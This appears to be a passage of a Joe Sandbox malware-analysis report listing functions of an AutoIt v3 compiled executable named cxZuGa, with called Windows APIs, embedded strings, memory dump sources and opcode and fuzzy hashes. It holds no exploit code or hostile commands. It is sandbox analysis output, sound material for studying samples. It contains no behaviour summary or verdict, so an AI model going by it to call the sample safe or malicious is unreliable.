                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: AU3!$EA06$SCRIPT
                                                            • API String ID: 3051347437-2925976212
                                                            • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction ID: a252a0850e697df7a53a355dfe348ecdae3d615055cd24718c5829791197df8f
                                                            • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction Fuzzy Hash: 529101BAB09641C6EB24AB21B444BBCABA0BB45BC4F854137DE8D477C5DF38E405D322

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentInfoSystemVersionWow64
                                                            • String ID: |O
                                                            • API String ID: 1568231622-607156228
                                                            • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction ID: ca5628a528516a3c7369950af00543948cee454a580332c9171f9419ba4db0bc
                                                            • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction Fuzzy Hash: 40D19FADA1D2C285F620AB16BC40379BB98AF11784FD04077E59D0A7A5EEBCB105C773

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 1787492119-0
                                                            • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction ID: da046d8dc3205e9abab69aaae6ce15afda1b946f49563a7e0fdefc9dc36d4543
                                                            • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction Fuzzy Hash: 37E1906AB08B81C5EB14EB26E5503BDA7A1FB84B88F804537EE5D477A9DF38E401C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                            • String ID:
                                                            • API String ID: 2695905019-0
                                                            • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction ID: cdc2e07748c9db39bfe47beceb184322b62a90c0a96adc87534cca1c1d6534b4
                                                            • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction Fuzzy Hash: D1F089D5D08606C2EA24AB28B8183349361BF81BB7FD44331D4BF062E4DF7CD458C211

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                            • API String ID: 2667193904-1575078665
                                                            • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction ID: fb704b648b4e7517aa85c3c424de9f444a9e460c41336445f64043e992edd548
                                                            • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction Fuzzy Hash: 42913E6AA1864295EB10FB24F8402BDB364FF84784FC01133E94D47AA9DF7CD545D762

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction ID: 1e63f47785080c9ca6d0307f882d2cc42c147392af774170a720d38f0dd32288
                                                            • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction Fuzzy Hash: 275167BDA0C64381FA28BB25F884379E668AF45B81FC40033D41D862A6EE7CF504D332

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-2659433951
                                                            • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction ID: be8672ed7d01d93adae0ed357807cb65bb729d4152979e28f9503815188bf1e1
                                                            • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction Fuzzy Hash: 82314B7AA18B028AE700EF61F8443AD7BB4FB44759F900136CA5D17B68DF7C9158CB51

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: DestroySendStringUninitializeUnregisterWindow
                                                            • String ID: close all
                                                            • API String ID: 1992507300-3243417748
                                                            • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction ID: 148bf74dedb6e574e0774a024f9f90cbb2a9d248a5ed62dfc0e73531430f0bc7
                                                            • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction Fuzzy Hash: AFE11AAAB0DA0281EE59EB16E55037CA360BF95B44FD44073DB0E57291DF38E862C722

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: AutoIt v3
                                                            • API String ID: 423443420-1704141276
                                                            • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction ID: 5c215c49bda3d857979d06b0dd0f480abf9703e2aaa8cf70cdfcda7176a255fa
                                                            • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction Fuzzy Hash: 6B31197AA08B42CAE740EB92F8843A8B778BB88755F80043AC99D57718DF7CD054C761

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction ID: 68e5f934b92c3563cd39f011f87b5529b94c71954df8295a769ee1bb5b8c5d50
                                                            • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction Fuzzy Hash: 5AC1D0BAB28B418AEB10DF68E4413AC7761EB48BA8F405236DE2E5B795CF38D055C351

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                            • String ID:
                                                            • API String ID: 3249950245-0
                                                            • Opcode ID: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                            • Instruction ID: 92f59ec6f707231a921c19f83533423a21177ab9f1794f9a7fb2a030158bc386
                                                            • Opcode Fuzzy Hash: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                            • Instruction Fuzzy Hash: BF22A1BAA0C68286EB64FB24F4443B9A7A0FB45748F954137DA4D47696CF3CE841C723

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 849 7ff7ec123cbc-7ff7ec123d88 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Show
                                                            • String ID: AutoIt v3$d$edit
                                                            • API String ID: 2813641753-2600919596
                                                            • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction ID: 38cc726343106272e342790a88a079cc6ab0abac4b111fabcf9298f4235744d6
                                                            • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction Fuzzy Hash: 712163B6A2CB41C6EB10DB11F888769B7E0F748799F50423AE64D4A758CFBDD045CB11

                                                            APIs
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142D8E
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142D9C
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DAC
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DBC
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DCA
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DD8
                                                              • Part of subcall function 00007FF7EC13EEC8: RegisterWindowMessageW.USER32 ref: 00007FF7EC13EF76
                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC12106D), ref: 00007FF7EC128209
                                                            • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC12106D), ref: 00007FF7EC12828F
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC12106D), ref: 00007FF7EC16D36A
                                                            Strings
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: AutoIt
                                                            • API String ID: 1986988660-2515660138
                                                            • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction ID: cda7c817526f690a53eb9f3a47262f1e7bd29d3261e29d78000120190bc44e6c
                                                            • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                            • Instruction Fuzzy Hash: DBC1C579D18B4285E640EF14BC80279FBA8FF94390F91023BE46D4A765EF7CA141C7A2

                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_Stringwcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3135491444-1585850449
                                                            • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction ID: ff9bd7969379563dc0c7ef4b04f614772dee4570d87f7eceeef670121a7f5279
                                                            • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                            • Instruction Fuzzy Hash: D24172A9A08786D6E724FB20F8403FAA365FB45344FD44033D64C4669ADE7CD544D762
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32 ref: 00007FF7EC16BAA2
                                                              • Part of subcall function 00007FF7EC1256D4: GetFullPathNameW.KERNEL32(?,00007FF7EC1256C1,?,00007FF7EC127A0C,?,?,?,00007FF7EC12109E), ref: 00007FF7EC1256FF
                                                              • Part of subcall function 00007FF7EC123EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7EC123ED8
                                                            Strings
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                            • API String ID: 779396738-2360590182
                                                            • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction ID: 5cb4760f3ea52551e89994827ec2220342bab4c993070281f23e08f3bb24521e
                                                            • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                            • Instruction Fuzzy Hash: 2B318DAA608B82C9E714EF21E8402ADB7A8FB49B84F984136DE8C47B55DF3CD545C721
                                                            APIs
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer$Killwcscpy
                                                            • String ID:
                                                            • API String ID: 3812282468-0
                                                            • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction ID: 834153750f5b4567050e9429bd08977bfcb83cd3be91b3011bfd5cda6aa52d1e
                                                            • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                            • Instruction Fuzzy Hash: 973184AAA0C7C287EB61AB11A1403B9BB59E745F84F984037DE4D0B749CE3CD545C762
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7EC126F52,?,?,?,?,?,?,00007FF7EC12782C), ref: 00007FF7EC126FA5
                                                            • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7EC126F52,?,?,?,?,?,?,00007FF7EC12782C), ref: 00007FF7EC126FD3
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7EC126F52,?,?,?,?,?,?,00007FF7EC12782C), ref: 00007FF7EC126FFA
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction ID: 81c9f6b46565826ede54ecd0e3511c20c93dcf13276eabe2fedc37c74bb16384
                                                            • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                            • Instruction Fuzzy Hash: 13218BBBA18B41C7D7209F25F450A6EB3A4FB49B84B841132EB8D83B18DF39E414DB55
                                                            APIs
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction ID: a39b1eed1701def3ff9e3b18a1c0c4e7126f7895b8a36b6b17bb0836fb335cb5
                                                            • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                            • Instruction Fuzzy Hash: 7CE048A8B04305C3EF147B617C8577557566F49B52F845039C80E07396DD7DE409C222
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            • Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                            • Instruction ID: 657374f51b407cacd3a46847ba65157207a9f7916897c65d1d6f25c2d5dafce1
                                                            • Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                            • Instruction Fuzzy Hash: 88228CBAB086418AEB10EF68E4403ACB7B1FB44B88F914137DA4D5B795DF38E455C322
                                                            APIs
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction ID: 1d91a23e7935aade15547839aea08a62a559e94195499d8c3fcd2ab87011253e
                                                            • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                            • Instruction Fuzzy Hash: 1D416DBAA08742C6E764AF24F414339B6A0EB45BA8F844236DA6D076C9CF3DD414D752
                                                            APIs
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction ID: b6a0ffdff8ffbb9dea317b5fc86acc66168f7d7decd84cf4724b4535df50be26
                                                            • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                            • Instruction Fuzzy Hash: 054182AAB14A56CAEB14EF25E4513BC63A0EB447C8F844132EA4D476C9DF3CD454D721
                                                            APIs
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction ID: 473e39a2360c60e1bbca02d4d269d7cb452101c74a4600e8448bb26a6c7ceee3
                                                            • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                            • Instruction Fuzzy Hash: A6419FB9909B85C6EB55AF11F4403ADB3A8FB48B88F844036EA4C0B399CF7CD550C761
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00007FF7EC123756
                                                              • Part of subcall function 00007FF7EC149334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EC149348
                                                              • Part of subcall function 00007FF7EC1236E8: SystemParametersInfoW.USER32 ref: 00007FF7EC123705
                                                              • Part of subcall function 00007FF7EC1236E8: SystemParametersInfoW.USER32 ref: 00007FF7EC123725
                                                              • Part of subcall function 00007FF7EC1237B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC1237F2
                                                              • Part of subcall function 00007FF7EC1237B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123807
                                                              • Part of subcall function 00007FF7EC1237B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC12388D
                                                              • Part of subcall function 00007FF7EC1237B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123924
                                                            • SystemParametersInfoW.USER32 ref: 00007FF7EC123797
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 4207566314-0
                                                            • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction ID: 2548610a2161f56a24290d3322b9fe3a9483502788fb17d612247786fef556e3
                                                            • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                            • Instruction Fuzzy Hash: 7501E8ACE0C2428AF714BB61B895775E669AF04700FC40037E45D8A3A6DE7DA485C722
                                                            APIs
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast
                                                            • String ID:
                                                            • API String ID: 918212764-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            APIs
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            Similarity
